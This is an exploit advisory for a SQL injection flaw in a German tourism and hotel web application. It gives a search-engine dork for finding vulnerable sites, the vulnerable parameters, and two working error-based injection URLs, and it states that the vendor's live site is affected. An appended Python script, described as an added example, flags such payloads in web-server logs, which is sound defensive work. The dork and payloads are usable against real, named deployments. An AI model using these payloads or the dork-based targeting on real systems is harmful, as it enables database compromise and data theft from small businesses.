tourismus-marketing-bayerischer-wald SQLi

2018.05.25
Arm_Legi (CH)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: tourismus-marketing-bayerischer-wald (webapp for Germans Hotel and Pension) SQLi
# dork : intext:Tourismus Marketing Bayerischer Wald inurl:index.php?PageName=
# Exploit Author: Arm_Legi (Anonplus)
# Website: http://anonplus.tk/
# Date: 21 May 2018
# Vendor : https://www.tourismus-marketing-bayerischer-wald.de/internet.html and https://www.putzwerbung.de/webdesign.html
# Version : Last Version
# CVE: N/A

Technical Details & Description:
============================================================
A remote SQL injection vulnerability has been discovered in a web app of https://www.tourismus-marketing-bayerischer-wald.de/internet.html
The vulnerability allows remote attackers to inject their own malicious SQL commands to compromise the connected web server or DBMS.
The vendor's website is vulnerable too.
============================================================

Request Method(s):
[+] GET

Vulnerable File(s):
[+] index.php
[+] angebote.html

Vulnerable Parameter(s):
[+] PageName=
[+] PauschalenID=

============================================================
PoC:

Http(s)://site.de/index.php?PageName=index' AND (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(SELECT (ELT(1707=1707,1))),0x716b7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dSRR'='dSRR

http(s)://site.de/preise-angebote/angebote.html?PauschalenID=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(113)%2cCHAR(70)%2cCHAR(115)%2cCHAR(69)%2cCHAR(122)%2cCHAR(75)%2cCHAR(120)%2cCHAR(120))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))

============================================================
I tried to contact the vendor, with no response.
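
A log-triage sketch for the two parameters named above, added here as an example and not part of the original advisory or the vendor's code: it percent-decodes each request in a web-server access log and flags `PageName` / `PauschalenID` values that carry the SQL constructs seen in the PoC requests or that do not match an assumed legitimate shape. The log lines, the expected value shapes and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed legitimate shapes (page slug, numeric id); the page does not document them.
EXPECTED = {
    "PageName": re.compile(r"[A-Za-z0-9_-]{1,64}"),
    "PauschalenID": re.compile(r"[0-9]{1,10}"),
}
# SQL constructs of the kind used by the error-based PoC requests (heuristic).
MARKERS = re.compile(
    r"select\b|information_schema|group\s+by|floor\s*\(\s*rand"
    r"|concat\s*\(|\brow\s*\(|char\s*\(\s*\d+",
    re.IGNORECASE,
)
# Request field of a Common Log Format line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample lines (documentation IP ranges, abbreviated payloads).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/May/2018:10:00:01 +0200] "GET /index.php?PageName=index HTTP/1.1" 200 5120',
    '198.51.100.9 - - [21/May/2018:10:00:05 +0200] "GET /index.php?PageName=index%27%20AND%20'
    '(SELECT%20COUNT(*)%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x) HTTP/1.1" 500 310',
    '203.0.113.7 - - [21/May/2018:10:01:12 +0200] "GET /preise-angebote/angebote.html?PauschalenID=12 HTTP/1.1" 200 8841',
    '198.51.100.9 - - [21/May/2018:10:01:30 +0200] "GET /preise-angebote/angebote.html'
    '?PauschalenID=(select%201%20and%20row(1%2c1)) HTTP/1.1" 500 310',
    '198.51.100.9 - - [21/May/2018:10:01:44 +0200] "GET /index.php?PageName=index%27 HTTP/1.1" 500 310',
]

def inspect_line(line):
    """Return (parameter, reason) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if name not in EXPECTED:
            continue
        if MARKERS.search(value):
            findings.append((name, "sql-construct"))
        elif not EXPECTED[name].fullmatch(value):
            findings.append((name, "unexpected-shape"))
    return findings

def scan(lines):
    """Map 1-based line number to findings, for lines that triggered."""
    return {i: f for i, line in enumerate(lines, 1) if (f := inspect_line(line))}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Hits paired with HTTP 500 responses or MySQL duplicate-key errors in the application log are the ones to review first, since error-based injection relies on the database error being returned.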



Copyright 2018, cxsecurity.com

 
